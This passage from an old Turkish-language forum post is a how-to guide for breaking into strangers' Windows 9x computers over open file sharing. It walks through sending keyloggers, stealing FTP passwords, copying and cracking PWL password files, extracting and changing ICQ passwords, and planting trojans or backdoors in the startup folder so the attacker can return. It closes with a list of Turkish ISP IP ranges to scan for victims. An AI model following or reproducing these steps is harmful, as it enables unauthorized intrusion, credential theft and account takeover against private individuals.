***** Password(win9x) yazan yere tiklayin bu sekilde sifreyi kirar sizde kirdigi sifreyi sifre penceresine yazin ve devam edin. 4-Simdi bilgisayar elinizde sayilir.Simdide Hallet'i açin ipi yazan yere açik buldugunuz ip numarasini yazin ben sirasiyla sunlari yapiyorumm ama siz istediginizi yapabilirsiniz.Ilk basta key log butonuna basin size iki *** çikar bir keylog gönder iki keylog indir istediginizi yapin.(Bu arada keylogun görevi bir bilgisayarin açilisindan kapanisina kadar ne yaptiysa hangi programi çalistirdiysa ne yazdiysa onu kaydetmek).Ikinci olarak ftp butonuna tiklayin size o bilgisayarda bulunan ftp sifrelerini yollar bunu çalistirmak için yollanan dosyayi alin ve hangi ftp programini kullaniyosaniz onun içine atin bu sekilde sitesinide ele geçirirsiniz.Üçüncü olarak Pwl indir butonuna tiklayin size karsi bilgisayarin pwl dosyalarini aninda kopyalar(Pwl dosyasinin içinde kisinin internet hesaplarinin sifresi bulunur)evet buda tamam.Pwl kirmayi biraz sonra anlaticam.Simdi de görüntülenecek dizininde program files yazisini silin isterseniz dursun ama eger silerseniz direk c ye girersiniz.Evet simdide isterseniz belgelerim yazan yere tiklayarak kisinin özel dosyalarina ulasabilirsiniz.Sirada program files girin adamin icq su varmi bakin varsa çift tiklayin.Buradanda kullandigi versiyonun adi olan dizine (2000b, 2001a, 2001b vs.) girin ve içinde icqnumarasi.dat dosyasini kopyalayin ve kendi bilgisayariniza atin.Iste bu kadar artik kopabilirsiniz tabi isiniz bittiyse bana bu kadar yeterli.Bu arada çikmadan önce bilgisayara masaüstüne veya start-up'ina trojan veya diger backdoorlari birakirsaniz daha sonra tekrar girebilmeniz için açik kapi birakmis olursunuz. 5-Simdide pwl yi kiralim repwl dosyasini çalistirin browse yazan yere tiklayin ve karsi taraftan kopyalanan pwl dosyasinin yerini belirtin(eger hallet le indirdiyseniz hallet klasörünün içine atar).Simdide CheckPass'a tiklayin size kullanicinin internet sifresini ve kullanici adini verir tepe tepe kullanin 6-Simdide icq yu kiralim icqrin 'i çalistirin simdi alttaki Open Databese butonuna tiklayin ve kopyaladiginiz icq dat dosyasinin yerini belirtin simdide sol taraftaki sekmelerden internet sekmesine tiklayin iste bu kadar adamin icq sifresi karsinizda simdide sifreyi degistirin dilediginiz gibi kullanin. Not:Eger bilgisayariniz yavaslarsa kitlenmis zandedebilirsiniz ama beklerseniz istediginiz sey açilir.Genelde ttnet ve bulundugunuz ildeki ip araliklarini tercih edin hizli oluyor birde eger bilgisyarinizda NetBEUI protokolu yoksa yükleyin, yoksa arattiginizda makinalari görür ama makinaya giremezsiniz.(Bu protokol yoksa ve yüklemek istiyorsaniz : Denetim Masasi > Ag > Ekle > Iletisim Kurallari > Microsoft NetBEUI i secin.Ok diyin) IP ARALIKLARI: 195.174.96.0 - 195.174.127.255 - TTnet 212.253.0.0 - 212.253.255.255 - Superonline 213.204.64.0 - 213.204.88.255 - YIMPASNET 195.174.96.0 - 195.174.127.255 - Ultranet (kablo) 213.194.96.0 - 213.194.99.255 - TR-BNET 212.174.0.0 - 212.175.255.255 - TR-TELEKOM-990407 195.87.153.0 - 195.87.153.255 - KOCNET-NETWORK 195.174.0.0 - 195.175.255.255 - TR-TELEKOM-960902 212.29.107.0 - 212.29.127.255 - VESTELNET 62.29.0.0 - 62.29.127.255 - TR-DOGAN-20000427 144.122.0.0 - 144.122.255.255 - METU-NET 62.248.32.0 - 62.248.47.255 - KABLONET 212.64.192.0 - 212.64.223.255 - TR-ATLAS-990420 217.164.0.0 - 217.165.255.255 - AE-EMIRNET-20010405 212.103.160.0 - 212.103.166.255 - GEGANETNET 213.254.128.0 - 213.254.148.255 - DEKSAR (Barracuda) 213.153.211.0 - 213.153.215.255 - TNN-NET1 (turk net) 194.27.48.0 - 194.27.49.255 - TRATAUNI-NET (ulak net) 62.85.129.0 - 62.85.129.255 - RTNET-CYPOP-2 (rt net) 217.131.0.0 - 217.131.255.255 - TR-SUPERONLINE-980319 213.14.57.0 - 213.14.72.255 - VESTELNET 213.43.129.0 - 213.43.255.255 - IXIR 193.140.40.0 - 193.140.47.255 - DAU-NET 213.243.0.0 - 213.243.15.255 - DOL 212.58.0.0 - 212.58.15.255 - DORUKNET 193.192.98.0 - 193.192.118.255 - NETONE-NET 213.153.251.0 - 213.153.255.255 - TNN-NET1 212.146.128.0 - 212.146.175.255 - ANET 212.174.242.0 - 212.174.243.255 - KAYNET 212.175.244.0 - 212.175.245.255 - MAYANET |
|
|
|
| Şu Anda Konuyu İnceleyen Aktif Kullanıcılar: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | |
|
|
Benzer Konular
|
||||
| Konu | Konuyu Başlatan | Forum | Cevaplar | Son Mesaj |
| Devasal resimli açıklamalı Ve bulanmayan programlar serisi rüya gibi | PencheStyle | A-B-C-D-E | 26 | 25.05.2007 05:40 |
| MSN için birrsürrüüüüüüü prgram hepside süper emek verilerek yapıldı... gir gör süper | crazy_kıvo | Sohbet Programları | 5 | 28.04.2007 19:51 |
| ya olduğun gibi görün yada göründüğün gibi ol | nayli | Yeni Üyeler İçin Tanışma ve Kaynaşma Bölümü | 8 | 20.03.2007 22:42 |
| Photoshop,Corel gibi programlar öğrenmek istiyorum | osmanmuh | Web Tasarım | 3 | 02.02.2007 12:16 |
.jpg)
.jpg)
selam
